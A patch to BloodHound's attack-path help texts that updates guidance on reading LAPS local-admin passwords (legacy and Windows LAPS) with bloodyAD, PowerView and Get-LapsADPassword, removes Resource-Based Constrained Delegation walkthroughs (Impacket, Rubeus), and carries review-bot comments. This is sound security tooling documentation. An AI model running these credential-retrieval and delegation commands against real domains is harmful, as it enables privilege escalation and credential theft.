From 2351e5c19290ec8fe2ac4c986c67912260f68af5 Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 16 Dec 2024 11:23:58 +0100 Subject: [PATCH 1/4] fix retrieve LAPS helptext Cover Windows LAPS, remove non-LAPS computer abuses for AllExtendedRights, remove LAPS abuse for domain nodes. --- .../AllExtendedRights/LinuxAbuse.tsx | 140 +++----------- .../AllExtendedRights/References.tsx | 12 +- .../AllExtendedRights/WindowsAbuse.tsx | 175 ++++-------------- .../HelpTexts/GenericAll/LinuxAbuse.tsx | 59 +++--- .../HelpTexts/GenericAll/References.tsx | 12 ++ .../HelpTexts/GenericAll/WindowsAbuse.tsx | 48 ++++- .../components/HelpTexts/Owns/LinuxAbuse.tsx | 62 ++++--- .../components/HelpTexts/Owns/References.tsx | 12 ++ .../HelpTexts/Owns/WindowsAbuse.tsx | 48 ++++- .../HelpTexts/ReadLAPSPassword/General.tsx | 15 +- .../HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx | 19 +- .../HelpTexts/ReadLAPSPassword/References.tsx | 14 +- .../ReadLAPSPassword/WindowsAbuse.tsx | 32 ++-- .../HelpTexts/WriteDacl/LinuxAbuse.tsx | 61 +++--- .../HelpTexts/WriteDacl/References.tsx | 12 ++ .../HelpTexts/WriteDacl/WindowsAbuse.tsx | 48 ++++- .../HelpTexts/WriteOwner/LinuxAbuse.tsx | 61 +++--- .../HelpTexts/WriteOwner/References.tsx | 12 ++ .../HelpTexts/WriteOwner/WindowsAbuse.tsx | 48 ++++- 19 files changed, 462 insertions(+), 428 deletions(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx index ffe3312489..8f6eba5fdf 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx 
@@ -57,116 +57,46 @@ const LinuxAbuse: FC = ({ sourceName, targ ); case 'Computer': - if (haslaps) { return ( <> - The AllExtendedRights permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. - - - - Alternatively, AllExtendedRights on a computer object can be used to perform a - Resource-Based Constrained Delegation attack. - - - Retrieve LAPS Password - - The AllExtendedRights permission grants {sourceName} the ability to obtain the RID 500 - administrator password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. - - - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Resource-Based Constrained Delegation - - First, if an attacker does not control an account with an SPN set, a new attacker-controlled - computer account can be added with Impacket's addcomputer.py example script: - - - { - "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'" - } + The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - We now need to configure the target object so that the attacker-controlled computer can - delegate to it. 
Impacket's rbcd.py script can be used for that purpose: - - - { - "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'" - } + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
- And finally we can get a service ticket for the service name (sname) we want to "pretend" to - be "admin" for. Impacket's getST.py example script can be used for that purpose. + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - { - "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'" - } + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} - This ticket can then be used with Pass-the-Ticket, and could grant access to the file system - of the TARGETCOMPUTER. + See Windows abuse for retrieving and decrypting the encrypted attributes. ); - } else { - return ( - <> - - AllExtendedRights on a computer object can be used to perform a Resource-Based Constrained - Delegation attack. - - - Resource-Based Constrained Delegation - - First, if an attacker does not control an account with an SPN set, a new attacker-controlled - computer account can be added with Impacket's addcomputer.py example script: - - - { - "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'" - } - - - We now need to configure the target object so that the attacker-controlled computer can - delegate to it. Impacket's rbcd.py script can be used for that purpose: - - - { - "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'" - } - - - And finally we can get a service ticket for the service name (sname) we want to "pretend" to - be "admin" for. Impacket's getST.py example script can be used for that purpose. 
- - - { - "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'" - } - - - This ticket can then be used with Pass-the-Ticket, and could grant access to the file system - of the TARGETCOMPUTER. - - - ); - } case 'Domain': return ( <> @@ -185,24 +115,6 @@ const LinuxAbuse: FC = ({ sourceName, targ {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"} - - Retrieve LAPS Passwords - - - The AllExtendedRights permission also grants {sourceName} enough privileges, to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - ); case 'CertTemplate': diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx index c51284042d..c7380492d4 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx @@ -42,12 +42,16 @@ const References: FC = () => { https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
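Review bot: The bloodyAD example closing the Computer branch queries only the legacy attributes (`ms-mcs-admpwd`, `ms-mcs-admpwdexpirationtime`) with a domain-wide `(ms-mcs-admpwdexpirationtime=*)` filter, yet the paragraph just above lists `msLAPS-Password` as a plaintext attribute too, so a reader will take the example as covering both editions and as targeting {targetName}. Qualify the lead-in, e.g. `Plaintext attributes can be read using a simple LDAP client. For example, for legacy LAPS, with bloodyAD:`, so the scope of the example matches the text. The same example is added in the GenericAll, Owns and ReadLAPSPassword LinuxAbuse hunks of this patch. Separately, with the `if (haslaps)` branch removed, the Computer text now asserts a LAPS password exists for every computer, and if `haslaps` is still destructured in the component signature (outside this hunk) it is an unused variable under the repo's lint rules; either keep a `haslaps ?` conditional or state that the edge is only emitted for LAPS-managed computers.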
- - https://www.thehacker.recipes/ad/movement/dacl/readlapspassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://eladshamir.com/2019/01/28/Wagging-the-Dog.html + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD
= ({ 
@@ -88,167 +88,54 @@ const WindowsAbuse: FC = ({ ); case 'Computer': - if (haslaps) { return ( <> - The AllExtendedRights permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - - Alternatively, AllExtendedRights on a computer object can be used to perform a - Resource-Based Constrained Delegation attack. - - - Resource-Based Constrained Delegation attack - - - Abusing this primitive is possible through the Rubeus project. - - - - First, if an attacker does not control an account with an SPN set, Kevin Robertson's - Powermad project can be used to add a new attacker-controlled computer account: - - - - { - "New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' 
-AsPlainText -Force)" - } - - - - PowerView can be used to then retrieve the security identifier (SID) of the newly created - computer account: - - - - $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand - objectsid - - - - We now need to build a generic ACE with the attacker-added computer SID as the principal, - and get the binary bytes for the new DACL/ACE: - - - - {'$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"\n' + - '$SDBytes = New-Object byte[] ($SD.BinaryLength)\n' + - '$SD.GetBinaryForm($SDBytes, 0)'} - - - - Next, we need to set this newly created security descriptor in the - msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, - again using PowerView in this case: - - - - { - "Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}" - } - - - - We can then use Rubeus to hash the plaintext password into its RC4_HMAC form: - - - {'Rubeus.exe hash /password:Summer2018!'} - - And finally we can use Rubeus' *s4u* module to get a service ticket for the service name - (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), - and in this case grants us access to the file system of the TARGETCOMPUTER: + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
- - - { - 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' - } - - - ); - } else { - return ( - <> - - AllExtendedRights on a computer object can be used to perform a Resource-Based Constrained - Delegation attack. - - - - Abusing this primitive is possible through the Rubeus project. - - - - First, if an attacker does not control an account with an SPN set, Kevin Robertson's - Powermad project can be used to add a new attacker-controlled computer account: - - - - { - "New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)" - } - - - - PowerView can be used to then retrieve the security identifier (SID) of the newly created - computer account: - - - - $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand - objectsid + + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
- - We now need to build a generic ACE with the attacker-added computer SID as the principal, - and get the binary bytes for the new DACL/ACE: + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - - {'$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"\n' + - '$SDBytes = New-Object byte[] ($SD.BinaryLength)\n' + - '$SD.GetBinaryForm($SDBytes, 0)'} + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} - - Next, we need to set this newly created security descriptor in the - msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, - again using PowerView in this case: + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - { - "Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}" - } + {'Get-LapsADPassword "WIN10" -AsPlainText'} - - - We can then use Rubeus to hash the plaintext password into its RC4_HMAC form: - - - {'Rubeus.exe hash /password:Summer2018!'} - - And finally we can use Rubeus' *s4u* module to get a service ticket for the service name - (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), - and in this case grants us access to the file system of the TARGETCOMPUTER: - - - - { - 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' - } - + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). +
); - } case 'Domain': return ( diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx index 3928fcedc1..84d60352ba 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx @@ -163,21 +163,42 @@ const LinuxAbuse: FC = ( Retrieve LAPS Password Full control of a computer object is abusable when the computer's local admin account - credential is controlled with LAPS. The clear-text password for the local administrator - account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With - full control of the computer object, you may have the ability to read this attribute, or - grant yourself the ability to read the attribute by modifying the computer object's security - descriptor. + credential is controlled with LAPS. - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + For systems using legacy LAPS, the following AD computer object properties are relevant: +
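Review bot: The sentence `Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module.` overstates what this edge grants: `msLAPS-EncryptedPassword` is encrypted to the principal configured as the authorized decryptor (Domain Admins by default), so being able to read the attribute does not by itself mean `Get-LapsADPassword "WIN10" -AsPlainText` will return a plaintext value. Suggest `Encrypted attributes can be decrypted with Microsoft's LAPS PowerShell module when running as the configured authorized decryptor (Domain Admins by default). For example:` so both the reader and a defender assessing exposure know the read right alone may yield only the plaintext attribute when one is present. The PowerView example likewise queries only the legacy `ms-mcs-admpwd` attributes although `msLAPS-Password` is listed as plaintext above, and the two examples use different placeholders (`"MachineName"` vs `"WIN10"`); one consistent placeholder would read better. The same text is added in the GenericAll, Owns and ReadLAPSPassword WindowsAbuse hunks.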
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled computer account can be added with Impacket's addcomputer.py example script: @@ -325,24 +346,6 @@ const LinuxAbuse: FC = ( {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"}
- Retrieve LAPS Passwords - - - The AllExtendedRights permission also grants {sourceName} enough permissions, to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Generic Descendent Object Takeover The simplest and most straight forward way to obtain control of the objects of the domain is to diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx index aa69acf771..5384d4bd4a 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx @@ -168,6 +168,18 @@ const References: FC = () => { href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'> https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53 +
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx index a3fe7b33c0..6eb7f1e593 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx @@ -215,10 +215,7 @@ const WindowsAbuse: FC = <> The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + administrator) password of {targetName}. @@ -233,6 +230,49 @@ const WindowsAbuse: FC = Constrained Delegation attack. + Retrieve LAPS Password + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). + + Shadow Credentials attack To abuse the permission, use Whisker. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx index e5095855a6..18136f7bda 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx @@ -227,24 +227,45 @@ const LinuxAbuse: FC = ( "dacledit.py -action 'remove' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'" }
+ Retrieve LAPS Password - Full control of a computer object is abusable when the computer's local admin account - credential is controlled with LAPS. The clear-text password for the local administrator - account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With - full control of the computer object, you may have the ability to read this attribute, or - grant yourself the ability to read the attribute by modifying the computer object's security - descriptor. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. + + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
- - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled @@ -412,25 +433,6 @@ const LinuxAbuse: FC = ( {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"} - Retrieve LAPS Passwords - - - If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the - AllExtendedRights permission included grants {sourceName} enough privileges to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Generic Descendent Object Takeover The simplest and most straight forward way to obtain control of the objects of the domain is to diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx index 47864ed953..a03165c467 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx @@ -143,6 +143,18 @@ const References: FC = () => { href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'> https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53 +
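Review bot: The new intro sentence of the Retrieve LAPS Password section, `The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.`, sits in the Owns help text, where the preceding dacledit.py context shows GenericAll is only held after the owner grants it to themselves, so the sentence is true only after that step. Either reuse the GenericAll/LinuxAbuse wording (`Full control of a computer object is abusable when the computer's local admin account credential is controlled with LAPS.`) or make the chain explicit, e.g. `Once {sourceName} has granted itself GenericAll on {targetName}, it can retrieve the LAPS (RID 500 administrator) password.`. The WriteDacl/LinuxAbuse hunk at the end of this patch adds the same sentence and has the same problem.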
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx index 49cadd9a4c..49374da97f 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx @@ -307,10 +307,7 @@ const WindowsAbuse: FC = The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + administrator) password of {targetName}. @@ -325,6 +322,49 @@ const WindowsAbuse: FC = Constrained Delegation attack. + Retrieve LAPS Password + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). + + Shadow Credentials attack To abuse the permission, use Whisker. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx index 85e2e77a15..2442949f49 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx @@ -27,8 +27,19 @@ const General: FC = ({ sourceName, sourceType, targetName }) => { Password Solution (LAPS) on the computer {targetName}.
- The local administrator password for a computer managed by LAPS is stored in the confidential LDAP - attribute, "ms-mcs-AdmPwd". + For systems using legacy LAPS, the following AD computer object properties are relevant: + - **ms-Mcs-AdmPwd**: The plaintext LAPS password. + - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password expiration time. + + + + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + - **msLAPS-Password**: The plaintext LAPS password. + - **msLAPS-PasswordExpirationTime**: The LAPS password expiration time. + - **msLAPS-EncryptedPassword**: The encrypted LAPS password. + - **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. + - **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. + - **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history. ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx index 74e973476b..d29cc06d31 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx @@ -14,7 +14,7 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Link, Typography } from '@mui/material'; +import { Typography } from '@mui/material'; import { FC } from 'react'; import { EdgeInfoProps } from '../index'; 
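Review bot: The attribute list added to General.tsx uses markdown emphasis (`**ms-Mcs-AdmPwd**`) and, as far as the collapsed diff shows, no `<br />` between the items, unlike the same list in the other hunks of this patch; inside a JSX Typography element the asterisks render literally and the items collapse into one run-on paragraph. Drop the `**` and separate the items the way the AllExtendedRights/LinuxAbuse hunk does (one `<br />` per item), or render them as a list. I am inferring the missing `<br />` from the diff layout, so please confirm against the file.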
@@ -22,20 +22,17 @@ const LinuxAbuse: FC = () => { return ( <> - Sufficient control on a computer object is abusable when the computer's local admin account credential - is controlled with LAPS. The clear-text password for the local administrator account is stored in an - extended attribute on the computer object called ms-Mcs-AdmPwd. + Read the LAPS password attributes listed in the General section. - - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + + See Windows abuse for retrieving and decrypting the encrypted attributes. ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx index 6d25700ccb..5d4fbd1b43 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx @@ -30,9 +30,19 @@ const References: FC = () => { https://adsecurity.org/?p=3164 - - https://www.thehacker.recipes/ad/movement/dacl/readlapspassword +
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt +
+ + https://github.com/CravateRouge/bloodyAD + +
